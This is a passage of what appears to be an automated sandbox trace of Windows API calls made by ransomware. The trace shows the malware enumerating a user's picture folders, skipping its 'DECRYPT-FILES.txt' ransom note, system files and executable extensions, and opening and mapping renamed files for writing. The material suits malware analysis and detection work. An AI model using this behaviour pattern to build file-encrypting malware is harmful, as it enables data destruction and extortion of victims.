out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\5xeQDqiQHYKki.jpg.2IZpsxv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\5xeQDqiQHYKki.jpg.2IZpsxv" [0186.036] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.036] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\5xeQDqiQHYKki.jpg.2IZpsxv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ntwgr\\h371\\5xeqdqiqhykki.jpg.2izpsxv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x26c [0186.037] GetFileSizeEx (in: hFile=0x26c, lpFileSize=0x36fdfa8 | out: lpFileSize=0x36fdfa8*=3929) returned 1 [0186.037] CreateFileMappingW (hFile=0x26c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x270 [0186.037] MapViewOfFile (hFileMappingObject=0x270, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0186.037] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0186.038] CloseHandle (hObject=0x270) returned 1 [0186.038] CloseHandle (hObject=0x26c) returned 1 [0186.038] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.038] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x967efbe0, ftCreationTime.dwHighDateTime=0x1d4d22e, ftLastAccessTime.dwLowDateTime=0x192a5da0, ftLastAccessTime.dwHighDateTime=0x1d4ca23, ftLastWriteTime.dwLowDateTime=0xaf997b60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x10915, dwReserved0=0x0, dwReserved1=0x0, cFileName="asWtJL_ki3SxV4p.bmp.tqQnwY9", cAlternateFileName="ASWTJL~1.TQQ")) returned 1 [0186.038] lstrcmpiW (lpString1="asWtJL_ki3SxV4p.bmp.tqQnwY9", lpString2="DECRYPT-FILES.txt") returned -1 [0186.038] lstrcmpiW (lpString1="asWtJL_ki3SxV4p.bmp.tqQnwY9", lpString2="autorun.inf") returned -1 [0186.038] lstrcmpiW (lpString1="asWtJL_ki3SxV4p.bmp.tqQnwY9", lpString2="boot.ini") returned -1 [0186.038] lstrcmpiW (lpString1="asWtJL_ki3SxV4p.bmp.tqQnwY9", lpString2="desktop.ini") returned -1 [0186.038] lstrcmpiW (lpString1="asWtJL_ki3SxV4p.bmp.tqQnwY9", lpString2="ntuser.dat") returned -1 [0186.038] lstrcmpiW (lpString1="asWtJL_ki3SxV4p.bmp.tqQnwY9", lpString2="iconcache.db") returned -1 [0186.038] lstrcmpiW (lpString1="asWtJL_ki3SxV4p.bmp.tqQnwY9", lpString2="bootsect.bak") returned -1 [0186.038] lstrcmpiW (lpString1="asWtJL_ki3SxV4p.bmp.tqQnwY9", lpString2="ntuser.dat.log") returned -1 [0186.038] lstrcmpiW (lpString1="asWtJL_ki3SxV4p.bmp.tqQnwY9", lpString2="thumbs.db") returned -1 [0186.038] lstrcmpiW (lpString1="asWtJL_ki3SxV4p.bmp.tqQnwY9", lpString2="Bootfont.bin") returned -1 [0186.038] lstrlenW (lpString="asWtJL_ki3SxV4p.bmp.tqQnwY9") returned 27 [0186.038] lstrcmpiW (lpString1="tqQnwY9", lpString2="lnk") returned 1 [0186.038] lstrcmpiW (lpString1="tqQnwY9", lpString2="exe") returned 1 [0186.038] lstrcmpiW (lpString1="tqQnwY9", lpString2="sys") returned 1 [0186.038] lstrcmpiW (lpString1="tqQnwY9", lpString2="dll") returned 1 [0186.038] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\") returned 50 [0186.038] lstrlenW (lpString="asWtJL_ki3SxV4p.bmp.tqQnwY9") returned 27 [0186.038] lstrcpyW (in: lpString1=0x36fe7e0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\" [0186.039] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\", lpString2="asWtJL_ki3SxV4p.bmp.tqQnwY9" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\asWtJL_ki3SxV4p.bmp.tqQnwY9") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\asWtJL_ki3SxV4p.bmp.tqQnwY9" [0186.039] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.039] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\asWtJL_ki3SxV4p.bmp.tqQnwY9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ntwgr\\h371\\aswtjl_ki3sxv4p.bmp.tqqnwy9"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x26c [0186.039] GetFileSizeEx (in: hFile=0x26c, lpFileSize=0x36fdfa8 | out: lpFileSize=0x36fdfa8*=67861) returned 1 [0186.039] CreateFileMappingW (hFile=0x26c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x270 [0186.039] MapViewOfFile (hFileMappingObject=0x270, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0186.040] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0186.040] CloseHandle (hObject=0x270) returned 1 [0186.040] CloseHandle (hObject=0x26c) returned 1 [0186.040] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.040] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf94b8a0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaf94b8a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaf94b8a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0186.040] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0186.040] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43cd6050, ftCreationTime.dwHighDateTime=0x1d4c76e, ftLastAccessTime.dwLowDateTime=0x19a04270, ftLastAccessTime.dwHighDateTime=0x1d4c719, ftLastWriteTime.dwLowDateTime=0xaf9e3e20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xc367, dwReserved0=0x0, dwReserved1=0x0, cFileName="KHINzcSap9DzrT.bmp.51Uk", cAlternateFileName="KHINZC~1.51U")) returned 1 [0186.040] lstrcmpiW (lpString1="KHINzcSap9DzrT.bmp.51Uk", lpString2="DECRYPT-FILES.txt") returned 1 [0186.040] lstrcmpiW (lpString1="KHINzcSap9DzrT.bmp.51Uk", lpString2="autorun.inf") returned 1 [0186.040] lstrcmpiW (lpString1="KHINzcSap9DzrT.bmp.51Uk", lpString2="boot.ini") returned 1 [0186.040] lstrcmpiW (lpString1="KHINzcSap9DzrT.bmp.51Uk", lpString2="desktop.ini") returned 1 [0186.041] lstrcmpiW (lpString1="KHINzcSap9DzrT.bmp.51Uk", lpString2="ntuser.dat") returned -1 [0186.041] lstrcmpiW (lpString1="KHINzcSap9DzrT.bmp.51Uk", lpString2="iconcache.db") returned 1 [0186.041] lstrcmpiW (lpString1="KHINzcSap9DzrT.bmp.51Uk", lpString2="bootsect.bak") returned 1 [0186.041] lstrcmpiW (lpString1="KHINzcSap9DzrT.bmp.51Uk", lpString2="ntuser.dat.log") returned -1 [0186.041] lstrcmpiW (lpString1="KHINzcSap9DzrT.bmp.51Uk", lpString2="thumbs.db") returned -1 [0186.041] lstrcmpiW (lpString1="KHINzcSap9DzrT.bmp.51Uk", lpString2="Bootfont.bin") returned 1 [0186.041] lstrlenW (lpString="KHINzcSap9DzrT.bmp.51Uk") returned 23 [0186.041] lstrcmpiW (lpString1="51Uk", lpString2="lnk") returned -1 [0186.041] lstrcmpiW (lpString1="51Uk", lpString2="exe") returned -1 [0186.041] lstrcmpiW (lpString1="51Uk", lpString2="sys") returned -1 [0186.041] lstrcmpiW (lpString1="51Uk", lpString2="dll") returned -1 [0186.041] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\") returned 50 [0186.041] lstrlenW (lpString="KHINzcSap9DzrT.bmp.51Uk") returned 23 [0186.041] lstrcpyW (in: lpString1=0x36fe7e0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\" [0186.041] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\", lpString2="KHINzcSap9DzrT.bmp.51Uk" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\KHINzcSap9DzrT.bmp.51Uk") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\KHINzcSap9DzrT.bmp.51Uk" [0186.041] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.041] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\KHINzcSap9DzrT.bmp.51Uk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ntwgr\\h371\\khinzcsap9dzrt.bmp.51uk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x26c [0186.041] GetFileSizeEx (in: hFile=0x26c, lpFileSize=0x36fdfa8 | out: lpFileSize=0x36fdfa8*=50023) returned 1 [0186.041] CreateFileMappingW (hFile=0x26c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x270 [0186.042] MapViewOfFile (hFileMappingObject=0x270, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0186.042] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0186.042] CloseHandle (hObject=0x270) returned 1 [0186.042] CloseHandle (hObject=0x26c) returned 1 [0186.042] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.043] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x317d3730, ftCreationTime.dwHighDateTime=0x1d4cb57, ftLastAccessTime.dwLowDateTime=0x6d082030, ftLastAccessTime.dwHighDateTime=0x1d4ccab, ftLastWriteTime.dwLowDateTime=0xafa300e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xbc52, dwReserved0=0x0, dwReserved1=0x0, cFileName="lW_4.gif.Qpzml", cAlternateFileName="LW_4GI~1.QPZ")) returned 1 [0186.043] lstrcmpiW (lpString1="lW_4.gif.Qpzml", lpString2="DECRYPT-FILES.txt") returned 1 [0186.043] lstrcmpiW (lpString1="lW_4.gif.Qpzml", lpString2="autorun.inf") returned 1 [0186.043] lstrcmpiW (lpString1="lW_4.gif.Qpzml", lpString2="boot.ini") returned 1 [0186.043] lstrcmpiW (lpString1="lW_4.gif.Qpzml", lpString2="desktop.ini") returned 1 [0186.043] lstrcmpiW (lpString1="lW_4.gif.Qpzml", lpString2="ntuser.dat") returned -1 [0186.043] lstrcmpiW (lpString1="lW_4.gif.Qpzml", lpString2="iconcache.db") returned 1 [0186.043] lstrcmpiW (lpString1="lW_4.gif.Qpzml", lpString2="bootsect.bak") returned 1 [0186.043] lstrcmpiW (lpString1="lW_4.gif.Qpzml", lpString2="ntuser.dat.log") returned -1 [0186.043] lstrcmpiW (lpString1="lW_4.gif.Qpzml", lpString2="thumbs.db") returned -1 [0186.043] lstrcmpiW (lpString1="lW_4.gif.Qpzml", lpString2="Bootfont.bin") returned 1 [0186.043] lstrlenW (lpString="lW_4.gif.Qpzml") returned 14 [0186.043] lstrcmpiW (lpString1="Qpzml", lpString2="lnk") returned 1 [0186.043] lstrcmpiW (lpString1="Qpzml", lpString2="exe") returned 1 [0186.043] lstrcmpiW (lpString1="Qpzml", lpString2="sys") returned -1 [0186.043] lstrcmpiW (lpString1="Qpzml", lpString2="dll") returned 1 [0186.043] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\") returned 50 [0186.043] lstrlenW (lpString="lW_4.gif.Qpzml") returned 14 [0186.043] lstrcpyW (in: lpString1=0x36fe7e0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\" [0186.043] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\", lpString2="lW_4.gif.Qpzml" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\lW_4.gif.Qpzml") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\lW_4.gif.Qpzml" [0186.043] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.043] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\lW_4.gif.Qpzml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ntwgr\\h371\\lw_4.gif.qpzml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x26c [0186.044] GetFileSizeEx (in: hFile=0x26c, lpFileSize=0x36fdfa8 | out: lpFileSize=0x36fdfa8*=48210) returned 1 [0186.044] CreateFileMappingW (hFile=0x26c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x270 [0186.044] MapViewOfFile (hFileMappingObject=0x270, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0186.044] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0186.044] CloseHandle (hObject=0x270) returned 1 [0186.045] CloseHandle (hObject=0x26c) returned 1 [0186.045] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.045] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e044300, ftCreationTime.dwHighDateTime=0x1d4d3c8, ftLastAccessTime.dwLowDateTime=0xff933860, ftLastAccessTime.dwHighDateTime=0x1d4c7ea, ftLastWriteTime.dwLowDateTime=0xafa56240, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x3f36, dwReserved0=0x0, dwReserved1=0x0, cFileName="npHgP3n.jpg.FDqGD", cAlternateFileName="NPHGP3~1.FDQ")) returned 1 [0186.045] lstrcmpiW (lpString1="npHgP3n.jpg.FDqGD", lpString2="DECRYPT-FILES.txt") returned 1 [0186.045] lstrcmpiW (lpString1="npHgP3n.jpg.FDqGD", lpString2="autorun.inf") returned 1 [0186.045] lstrcmpiW (lpString1="npHgP3n.jpg.FDqGD", lpString2="boot.ini") returned 1 [0186.045] lstrcmpiW (lpString1="npHgP3n.jpg.FDqGD", lpString2="desktop.ini") returned 1 [0186.045] lstrcmpiW (lpString1="npHgP3n.jpg.FDqGD", lpString2="ntuser.dat") returned -1 [0186.045] lstrcmpiW (lpString1="npHgP3n.jpg.FDqGD", lpString2="iconcache.db") returned 1 [0186.045] lstrcmpiW (lpString1="npHgP3n.jpg.FDqGD", lpString2="bootsect.bak") returned 1 [0186.045] lstrcmpiW (lpString1="npHgP3n.jpg.FDqGD", lpString2="ntuser.dat.log") returned -1 [0186.045] lstrcmpiW (lpString1="npHgP3n.jpg.FDqGD", lpString2="thumbs.db") returned -1 [0186.045] lstrcmpiW (lpString1="npHgP3n.jpg.FDqGD", lpString2="Bootfont.bin") returned 1 [0186.045] lstrlenW (lpString="npHgP3n.jpg.FDqGD") returned 17 [0186.045] lstrcmpiW (lpString1="FDqGD", lpString2="lnk") returned -1 [0186.045] lstrcmpiW (lpString1="FDqGD", lpString2="exe") returned 1 [0186.045] lstrcmpiW (lpString1="FDqGD", lpString2="sys") returned -1 [0186.045] lstrcmpiW (lpString1="FDqGD", lpString2="dll") returned 1 [0186.045] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\") returned 50 [0186.045] lstrlenW (lpString="npHgP3n.jpg.FDqGD") returned 17 [0186.045] lstrcpyW (in: lpString1=0x36fe7e0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\" [0186.045] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\", lpString2="npHgP3n.jpg.FDqGD" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\npHgP3n.jpg.FDqGD") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\npHgP3n.jpg.FDqGD" [0186.045] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.046] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\npHgP3n.jpg.FDqGD" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ntwgr\\h371\\nphgp3n.jpg.fdqgd"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x26c [0186.046] GetFileSizeEx (in: hFile=0x26c, lpFileSize=0x36fdfa8 | out: lpFileSize=0x36fdfa8*=16182) returned 1 [0186.046] CreateFileMappingW (hFile=0x26c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x270 [0186.046] MapViewOfFile (hFileMappingObject=0x270, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0186.047] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0186.047] CloseHandle (hObject=0x270) returned 1 [0186.047] CloseHandle (hObject=0x26c) returned 1 [0186.047] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.047] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ed74a60, ftCreationTime.dwHighDateTime=0x1d4d4da, ftLastAccessTime.dwLowDateTime=0x2ffc6030, ftLastAccessTime.dwHighDateTime=0x1d4d4f2, ftLastWriteTime.dwLowDateTime=0xafa7c3a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x14533, dwReserved0=0x0, dwReserved1=0x0, cFileName="twKvLTg.gif.Myf47O", cAlternateFileName="TWKVLT~1.MYF")) returned 1 [0186.047] lstrcmpiW (lpString1="twKvLTg.gif.Myf47O", lpString2="DECRYPT-FILES.txt") returned 1 [0186.047] lstrcmpiW (lpString1="twKvLTg.gif.Myf47O", lpString2="autorun.inf") returned 1 [0186.047] lstrcmpiW (lpString1="twKvLTg.gif.Myf47O", lpString2="boot.ini") returned 1 [0186.047] lstrcmpiW (lpString1="twKvLTg.gif.Myf47O", lpString2="desktop.ini") returned 1 [0186.047] lstrcmpiW (lpString1="twKvLTg.gif.Myf47O", lpString2="ntuser.dat") returned 1 [0186.047] lstrcmpiW (lpString1="twKvLTg.gif.Myf47O", lpString2="iconcache.db") returned 1 [0186.047] lstrcmpiW (lpString1="twKvLTg.gif.Myf47O", lpString2="bootsect.bak") returned 1 [0186.047] lstrcmpiW (lpString1="twKvLTg.gif.Myf47O", lpString2="ntuser.dat.log") returned 1 [0186.047] lstrcmpiW (lpString1="twKvLTg.gif.Myf47O", lpString2="thumbs.db") returned 1 [0186.047] lstrcmpiW (lpString1="twKvLTg.gif.Myf47O", lpString2="Bootfont.bin") returned 1 [0186.047] lstrlenW (lpString="twKvLTg.gif.Myf47O") returned 18 [0186.047] lstrcmpiW (lpString1="Myf47O", lpString2="lnk") returned 1 [0186.047] lstrcmpiW (lpString1="Myf47O", lpString2="exe") returned 1 [0186.047] lstrcmpiW (lpString1="Myf47O", lpString2="sys") returned -1 [0186.047] lstrcmpiW (lpString1="Myf47O", lpString2="dll") returned 1 [0186.048] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\") returned 50 [0186.048] lstrlenW (lpString="twKvLTg.gif.Myf47O") returned 18 [0186.048] lstrcpyW (in: lpString1=0x36fe7e0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\" [0186.048] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\", lpString2="twKvLTg.gif.Myf47O" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\twKvLTg.gif.Myf47O") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\twKvLTg.gif.Myf47O" [0186.048] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.048] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\twKvLTg.gif.Myf47O" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ntwgr\\h371\\twkvltg.gif.myf47o"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x26c [0186.048] GetFileSizeEx (in: hFile=0x26c, lpFileSize=0x36fdfa8 | out: lpFileSize=0x36fdfa8*=83251) returned 1 [0186.048] CreateFileMappingW (hFile=0x26c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x270 [0186.048] MapViewOfFile (hFileMappingObject=0x270, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0186.049] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0186.049] CloseHandle (hObject=0x270) returned 1 [0186.049] CloseHandle (hObject=0x26c) returned 1 [0186.049] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.049] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ed74a60, ftCreationTime.dwHighDateTime=0x1d4d4da, ftLastAccessTime.dwLowDateTime=0x2ffc6030, ftLastAccessTime.dwHighDateTime=0x1d4d4f2, ftLastWriteTime.dwLowDateTime=0xafa7c3a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x14533, dwReserved0=0x0, dwReserved1=0x0, cFileName="twKvLTg.gif.Myf47O", cAlternateFileName="TWKVLT~1.MYF")) returned 0 [0186.049] FindClose (in: hFindFile=0x4798f8 | out: hFindFile=0x4798f8) returned 1 [0186.049] CloseHandle (hObject=0x264) returned 1 [0186.050] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36553fd0, ftCreationTime.dwHighDateTime=0x1d4d491, ftLastAccessTime.dwLowDateTime=0x587c3ab0, ftLastAccessTime.dwHighDateTime=0x1d4c68a, ftLastWriteTime.dwLowDateTime=0xafac8660, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x6e29, dwReserved0=0x0, dwReserved1=0x0, cFileName="ixqs-N95mkCcdeR5.gif.3n0IXgB", cAlternateFileName="IXQS-N~1.3N0")) returned 1 [0186.050] lstrcmpiW (lpString1="ixqs-N95mkCcdeR5.gif.3n0IXgB", lpString2="DECRYPT-FILES.txt") returned 1 [0186.050] lstrcmpiW (lpString1="ixqs-N95mkCcdeR5.gif.3n0IXgB", lpString2="autorun.inf") returned 1 [0186.050] lstrcmpiW (lpString1="ixqs-N95mkCcdeR5.gif.3n0IXgB", lpString2="boot.ini") returned 1 [0186.050] lstrcmpiW (lpString1="ixqs-N95mkCcdeR5.gif.3n0IXgB", lpString2="desktop.ini") returned 1 [0186.050] lstrcmpiW (lpString1="ixqs-N95mkCcdeR5.gif.3n0IXgB", lpString2="ntuser.dat") returned -1 [0186.050] lstrcmpiW (lpString1="ixqs-N95mkCcdeR5.gif.3n0IXgB", lpString2="iconcache.db") returned 1 [0186.050] lstrcmpiW (lpString1="ixqs-N95mkCcdeR5.gif.3n0IXgB", lpString2="bootsect.bak") returned 1 [0186.050] lstrcmpiW (lpString1="ixqs-N95mkCcdeR5.gif.3n0IXgB", lpString2="ntuser.dat.log") returned -1 [0186.050] lstrcmpiW (lpString1="ixqs-N95mkCcdeR5.gif.3n0IXgB", lpString2="thumbs.db") returned -1 [0186.050] lstrcmpiW (lpString1="ixqs-N95mkCcdeR5.gif.3n0IXgB", lpString2="Bootfont.bin") returned 1 [0186.050] lstrlenW (lpString="ixqs-N95mkCcdeR5.gif.3n0IXgB") returned 28 [0186.050] lstrcmpiW (lpString1="3n0IXgB", lpString2="lnk") returned -1 [0186.050] lstrcmpiW (lpString1="3n0IXgB", lpString2="exe") returned -1 [0186.050] lstrcmpiW (lpString1="3n0IXgB", lpString2="sys") returned -1 [0186.050] lstrcmpiW (lpString1="3n0IXgB", lpString2="dll") returned -1 [0186.050] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\") returned 45 [0186.050] lstrlenW (lpString="ixqs-N95mkCcdeR5.gif.3n0IXgB") returned 28 [0186.050] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\" [0186.050] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS 